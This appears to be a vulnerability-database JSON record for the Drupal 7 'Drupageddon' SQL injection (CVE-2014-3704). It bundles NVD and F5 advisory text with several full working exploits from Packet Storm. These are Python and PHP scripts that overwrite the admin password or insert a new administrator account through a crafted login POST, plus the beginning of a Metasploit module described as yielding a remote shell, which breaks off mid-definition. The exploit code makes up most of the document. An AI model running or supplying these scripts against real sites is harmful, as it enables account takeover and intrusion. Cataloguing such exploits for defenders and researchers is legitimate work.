{"id": "DRUPAL_NAME_SQLI", "bulletinFamily": "exploit", "title": "Immunity Canvas: DRUPAL_NAME_SQLI", "description": "**Name**| drupal_name_sqli \n---|--- \n**CVE**| CVE-2014-3704 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Drupal injection exploit \n**Notes**| CVE Name: CVE-2014-3704 \nVENDOR: drupal.org \nNotes: \n \nThis exploit replaces the password of 'Drupal User' with 'Drupal Password'. \nIf uid is specified, 'Drupal User' is ignored. \n \nRepeatability: Infinite \nReferences: ['https://www.drupal.org/SA-CORE-2014-005'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704 \n\n", "published": "2014-10-15T20:55:06", "modified": "2014-10-15T20:55:06", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/drupal_name_sqli", "reporter": "Immunity Canvas", "references": [], "cvelist": ["CVE-2014-3704"], "type": "canvas", "lastseen": "2018-11-01T14:03:26", "edition": 1, "viewCount": 13, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2018-11-01T14:03:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3704"]}, {"type": "f5", "idList": ["F5:K15782", "SOL15782"]}, {"type": "archlinux", "idList": ["ASA-201410-7"]}, {"type": "exploitdb", "idList": ["EDB-ID:35150", "EDB-ID:34984", "EDB-ID:34992", "EDB-ID:44355", "EDB-ID:34993"]}, {"type": "drupal", "idList": ["DRUPAL-SA-CORE-2014-005"]}, {"type": "nessus", "idList": ["DRUPAL_7_CORE_SQLI.NASL", "MANDRIVA_MDVSA-2015-181.NASL", "DRUPAL_7_32.NASL", "FEDORA_2014-13030.NASL", "FREEBSD_PKG_6F825FA4556011E4A4C300A0986F28C4.NASL", "DEBIAN_DSA-3051.NASL", "FEDORA_2014-13053.NASL", "FEDORA_2014-12934.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128738", "PACKETSTORM:128741", "PACKETSTORM:128744", "PACKETSTORM:128720"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105101", "OPENVAS:1361412562310868435", "OPENVAS:1361412562310868440", "OPENVAS:1361412562310703051", "OPENVAS:703051"]}, {"type": "dsquare", "idList": ["E-446"]}, {"type": "freebsd", "idList": ["6F825FA4-5560-11E4-A4C3-00A0986F28C4"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14479", "SECURITYVULNS:VULN:14032", "SECURITYVULNS:DOC:32107", "SECURITYVULNS:DOC:31296"]}, {"type": "debian", "idList": ["DEBIAN:BSA-098:467CD", "DEBIAN:DSA-3051-1:E0748"]}, {"type": "zdt", "idList": ["1337DAY-ID-30061", "1337DAY-ID-22771", "1337DAY-ID-22762", "1337DAY-ID-22814"]}, {"type": "canvas", "idList": ["DRUPAL_NAME_SQLI_CALLBACK"]}, {"type": "hackerone", "idList": ["H1:31756"]}, {"type": "seebug", "idList": ["SSV:87362", "SSV:87363"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6AE05C0C36F87EB49C39A4038C324777", "EXPLOITPACK:84DF4AE744B6A7D61BCB8FD28AC4BC73"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2014-3704.NSE"]}, {"type": "cisa", "idList": ["CISA:FFCDB9DA7615256969EE472D5D78DB00"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/DRUPAL_DRUPAGEDDON"]}], "modified": "2018-11-01T14:03:26", "rev": 2}, "vulnersScore": 7.2}}

{"cve": [{"lastseen": "2020-10-03T12:01:17", "description": "The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.", "edition": 3, "cvss3": {}, "published": "2014-10-16T00:55:00", "title": "CVE-2014-3704", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3704"], "modified": "2018-10-09T19:47:00", "cpe": ["cpe:/a:drupal:drupal_core:7.20", "cpe:/a:drupal:drupal_core:7.03", "cpe:/a:drupal:drupal_core:7.21", "cpe:/a:drupal:drupal_core:7.01", "cpe:/a:drupal:drupal_core:7.28", "cpe:/a:drupal:drupal_core:7.15", "cpe:/a:drupal:drupal_core:7.31", "cpe:/a:drupal:drupal_core:7.14", "cpe:/a:drupal:drupal_core:7.19", "cpe:/a:drupal:drupal_core:7.10", "cpe:/a:drupal:drupal_core:7.23", "cpe:/a:drupal:drupal_core:7.13", "cpe:/a:drupal:drupal_core:7.04", "cpe:/a:drupal:drupal_core:7.09", "cpe:/a:drupal:drupal_core:7.06", "cpe:/a:drupal:drupal_core:7.0", "cpe:/a:drupal:drupal_core:7.26", "cpe:/a:drupal:drupal_core:7.07", "cpe:/a:drupal:drupal_core:7.29", "cpe:/a:drupal:drupal_core:7.16", "cpe:/a:drupal:drupal_core:7.22", "cpe:/a:drupal:drupal_core:7.27", "cpe:/a:drupal:drupal_core:7.25", "cpe:/a:drupal:drupal_core:7.24", "cpe:/a:drupal:drupal_core:7.18", "cpe:/a:drupal:drupal_core:7.30", "cpe:/a:drupal:drupal_core:7.17", "cpe:/a:drupal:drupal_core:7.11", "cpe:/a:drupal:drupal_core:7.05", "cpe:/a:drupal:drupal_core:7.02", "cpe:/a:drupal:drupal_core:7.12", "cpe:/a:drupal:drupal_core:7.08"], "id": "CVE-2014-3704", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:drupal:drupal_core:7.04:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.06:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.31:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.15:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.13:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.29:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.24:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.26:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.19:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.17:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.30:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.08:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.05:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.14:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.28:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.27:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.12:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.16:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.09:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.25:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.07:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal_core:7.18:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:16", "bulletinFamily": "software", "cvelist": ["CVE-2014-3704"], "edition": 1, "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None \n| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4 \n| None \nBIG-IP AAM| None| 11.4.0 - 11.6.0| None \nBIG-IP AFM| None| 11.3.0 - 11.6.0| None \nBIG-IP Analytics| None| 11.0.0 - 11.6.0| None \nBIG-IP APM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None \nBIG-IP ASM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| None \nBIG-IP Edge Gateway \n| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| None \nBIG-IP Link Controller| None \n| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4 \n| None \nBIG-IP PEM| None \n| 11.3.0 - 11.6.0 \n| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| None| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| None \n| 4.0.0 - 4.4.0 \n| None \nBIG-IQ Device| None \n| 4.2.0 - 4.4.0 \n| None \nBIG-IQ Security| None \n| 4.0.0 - 4.4.0 \n| None \nLineRate| None| 2.2.0 - 2.4.1 \n1.6.0 - 1.6.3| None\n\nNone \n\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-03-14T19:55:00", "published": "2014-11-03T21:20:00", "href": "https://support.f5.com/csp/article/K15782", "id": "F5:K15782", "title": "SQL injection vulnerability CVE-2014-3704", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:04", "bulletinFamily": "software", "cvelist": ["CVE-2014-3704"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-07-25T00:00:00", "published": "2014-11-03T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15782.html", "id": "SOL15782", "title": "SOL15782 - SQL injection vulnerability CVE-2014-3704", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:20", "description": "", "published": "2014-10-17T00:00:00", "type": "packetstorm", "title": "Drupal Core 7.32 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "id": "PACKETSTORM:128738", "href": "https://packetstormsecurity.com/files/128738/Drupal-Core-7.32-SQL-Injection.html", "sourceData": "`#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 \n#Creditz to https://www.reddit.com/user/fyukyuk \nimport urllib2,sys \nfrom drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py \nhost = sys.argv[1] \nuser = sys.argv[2] \npassword = sys.argv[3] \nif len(sys.argv) != 3: \nprint \"host username password\" \nprint \"http://nope.io admin wowsecure\" \nhash = DrupalHash(\"$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML\", password).get_hash() \ntarget = '%s/?q=node&destination=node' % host \npost_data = \"name[0%20;update+users+set+name%3d\\'\" \\ \n+user \\ \n+\"'+,+pass+%3d+'\" \\ \n+hash[:55] \\ \n+\"'+where+uid+%3d+\\'1\\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in\" \ncontent = urllib2.urlopen(url=target, data=post_data).read() \nif \"mb_strlen() expects parameter 1\" in content: \nprint \"Success!\\nLogin now with user:%s and pass:%s\" % (user, password) \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128738/drupal732py-sql.txt"}, {"lastseen": "2016-12-05T22:23:58", "description": "", "published": "2014-10-17T00:00:00", "type": "packetstorm", "title": "Drupal 7.x SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "id": "PACKETSTORM:128744", "href": "https://packetstormsecurity.com/files/128744/Drupal-7.x-SQL-Injection.html", "sourceData": "`<?php \n/******************************************************** \n* Drupal 7 SQL Injection vulnerability demo \n* Created by Milan Kragujevic (of milankragujevic.com) \n* Read more at http://milankragujevic.com/post/66 \n* This will change the first user's username to admin \n* and their password to admin \n* Change $url to the website URL \n********************************************************/ \n$url = '[URL HERE]'; // URL of the website (http://domain.com/) \n$post_data = \"name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'\" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . \"'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in\"; \n \n$params = array( \n'http' => array( \n'method' => 'POST', \n'header' => \"Content-Type: application/x-www-form-urlencoded\\r\\n\", \n'content' => $post_data \n) \n); \n$ctx = stream_context_create($params); \n$data = file_get_contents($url . '?q=node&destination=node', null, $ctx); \n \nif(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { \necho \"Success! Log in with username \\\"admin\\\" and password \\\"admin\\\" at {$url}user/login\"; \n} else { \necho \"Error! Either the website isn't vulnerable, or your Internet isn't working. \"; \n} \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128744/drupal732-sql.txt"}, {"lastseen": "2016-12-05T22:20:17", "description": "", "published": "2014-10-16T00:00:00", "type": "packetstorm", "title": "Drupal 7.X SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-16T00:00:00", "id": "PACKETSTORM:128720", "href": "https://packetstormsecurity.com/files/128720/Drupal-7.X-SQL-Injection.html", "sourceData": "`#!/usr/bin/python \n# \n# \n# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 \n# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk) \n# \n# Tested on Drupal 7.31 with BackBox 3.x \n# \n# This material is intended for educational \n# purposes only and the author can not be held liable for \n# any kind of damages done whatsoever to your machine, \n# or damages caused by some other,creative application of this material. \n# In any case you disagree with the above statement,stop here. \n \nimport hashlib, urllib2, optparse, random, sys \n \n# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py \n# Calculate a non-truncated Drupal 7 compatible password hash. \n# The consumer of these hashes must truncate correctly. \n \nclass DrupalHash: \n \ndef __init__(self, stored_hash, password): \nself.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' \nself.last_hash = self.rehash(stored_hash, password) \n \ndef get_hash(self): \nreturn self.last_hash \n \ndef password_get_count_log2(self, setting): \nreturn self.itoa64.index(setting[3]) \n \ndef password_crypt(self, algo, password, setting): \nsetting = setting[0:12] \nif setting[0] != '$' or setting[2] != '$': \nreturn False \n \ncount_log2 = self.password_get_count_log2(setting) \nsalt = setting[4:12] \nif len(salt) < 8: \nreturn False \ncount = 1 << count_log2 \n \nif algo == 'md5': \nhash_func = hashlib.md5 \nelif algo == 'sha512': \nhash_func = hashlib.sha512 \nelse: \nreturn False \nhash_str = hash_func(salt + password).digest() \nfor c in range(count): \nhash_str = hash_func(hash_str + password).digest() \noutput = setting + self.custom64(hash_str) \nreturn output \n \ndef custom64(self, string, count = 0): \nif count == 0: \ncount = len(string) \noutput = '' \ni = 0 \nitoa64 = self.itoa64 \nwhile 1: \nvalue = ord(string[i]) \ni += 1 \noutput += itoa64[value & 0x3f] \nif i < count: \nvalue |= ord(string[i]) << 8 \noutput += itoa64[(value >> 6) & 0x3f] \nif i >= count: \nbreak \ni += 1 \nif i < count: \nvalue |= ord(string[i]) << 16 \noutput += itoa64[(value >> 12) & 0x3f] \nif i >= count: \nbreak \ni += 1 \noutput += itoa64[(value >> 18) & 0x3f] \nif i >= count: \nbreak \nreturn output \n \ndef rehash(self, stored_hash, password): \n# Drupal 6 compatibility \nif len(stored_hash) == 32 and stored_hash.find('$') == -1: \nreturn hashlib.md5(password).hexdigest() \n# Drupal 7 \nif stored_hash[0:2] == 'U$': \nstored_hash = stored_hash[1:] \npassword = hashlib.md5(password).hexdigest() \nhash_type = stored_hash[0:3] \nif hash_type == '$S$': \nhash_str = self.password_crypt('sha512', password, stored_hash) \nelif hash_type == '$H$' or hash_type == '$P$': \nhash_str = self.password_crypt('md5', password, stored_hash) \nelse: \nhash_str = False \nreturn hash_str \n# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py \n \ndef randomAgentGen(): \n \nuserAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', \n'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', \n'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', \n'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', \n'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', \n'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', \n'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', \n'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', \n'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', \n'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', \n'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', \n'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', \n'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', \n'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', \n'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', \n'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', \n'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', \n'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', \n'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', \n'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', \n'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', \n'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'] \n \nUA = random.choice(userAgent) \nreturn UA \n \n \ndef urldrupal(url): \nif url[:8] != \"https://\" and url[:7] != \"http://\": \nprint('[X] You must insert http:// or https:// procotol') \nsys.exit(1) \n# Page login \nurl = url+'/?q=node&destination=node' \nreturn url \n \n \nbanner = \"\"\" \n______ __ _______ _______ _____ \n| _ \\ .----.--.--.-----.---.-| | | _ || _ | _ | \n|. | \\| _| | | _ | _ | | |___| _|___| |.| | \n|. | |__| |_____| __|___._|__| / |___(__ `-|. | \n|: 1 / |__| | | |: 1 | |: | \n|::.. . / | | |::.. . | |::.| \n`------' `---' `-------' `---' \n_______ __ ___ __ __ __ \n| _ .-----| | | .-----|__.-----.----| |_|__.-----.-----. \n| 1___| _ | | |. | | | -__| __| _| | _ | | \n|____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__| \n|: 1 | |__| |: | |___| \n|::.. . | |::.| \n`-------' `---' \n \nDrup4l => 7.0 <= 7.31 Sql-1nj3ct10n \nAdmin 4cc0unt cr3at0r \n \nDiscovered by: \n \nStefan Horst \n(CVE-2014-3704) \n \nWritten by: \n \nClaudio Viviani \n \nhttp://www.homelab.it \n \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \nhttps://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww \n \n\"\"\" \n \ncommandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\\n') \ncommandList.add_option('-t', '--target', \naction=\"store\", \nhelp=\"Insert URL: http[s]://www.victim.com\", \n) \ncommandList.add_option('-u', '--username', \naction=\"store\", \nhelp=\"Insert username\", \n) \ncommandList.add_option('-p', '--pwd', \naction=\"store\", \nhelp=\"Insert password\", \n) \noptions, remainder = commandList.parse_args() \n \n# Check args \nif not options.target or not options.username or not options.pwd: \nprint(banner) \nprint \ncommandList.print_help() \nsys.exit(1) \n \nprint(banner) \n \nhost = options.target \nuser = options.username \npassword = options.pwd \n \nhash = DrupalHash(\"$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML\", password).get_hash() \n \ntarget = urldrupal(host) \n \n \n# Add new user: \n# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users \n# \n# Set administrator permission (rid = 3): \n# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3) \n# \npost_data = \"name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27\"+user+\"%27,+%27\"+hash[:55]+\"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27\"+user+\"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in\" \n \nUA = randomAgentGen() \ntry: \nreq = urllib2.Request(target, post_data, headers={ 'User-Agent': UA }) \ncontent = urllib2.urlopen(req).read() \n \nif \"mb_strlen() expects parameter 1\" in content: \nprint \"[!] VULNERABLE!\" \nprint \nprint \"[!] Administrator user created!\" \nprint \nprint \"[*] Login: \"+str(user) \nprint \"[*] Pass: \"+str(password) \nprint \"[*] Url: \"+str(target) \n \nelse: \nprint \"[X] NOT Vulnerable :(\" \n \nexcept urllib2.HTTPError as e: \n \nprint \"[X] HTTP Error: \"+str(e.reason)+\" (\"+str(e.code)+\")\" \n \nexcept urllib2.URLError as e: \n \nprint \"[X] Connection error: \"+str(e.reason) \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128720/drup4l_7_31_SqlInj_add_admin.py.txt"}, {"lastseen": "2016-12-05T22:20:43", "description": "", "published": "2014-10-18T00:00:00", "type": "packetstorm", "title": "Drupal HTTP Parameter Key/Value SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-18T00:00:00", "id": "PACKETSTORM:128741", "href": "https://packetstormsecurity.com/files/128741/Drupal-HTTP-Parameter-Key-Value-SQL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupal HTTP Parameter Key/Value SQL Injection', \n'Description' => %q{ \nThis module exploits the Drupal HTTP Parameter Key/Value SQL Injection \n(aka Drupageddon) in order to achieve a remote shell on the vulnerable \ninstance. This module was tested against Drupal 7.0 and 7.31 (was fixed \nin 7.32). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SektionEins', # discovery \n'Christian Mehlmauer', # msf module \n'Brandon Perry' # msf module \n], \n'References' => \n[ \n['CVE', '2014-3704'], \n['URL', 'https://www.drupal.org/SA-CORE-2014-005'], \n['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html'] \n], \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => [['Drupal 7.0 - 7.31',{}]], \n'DisclosureDate' => 'Oct 15 2014', 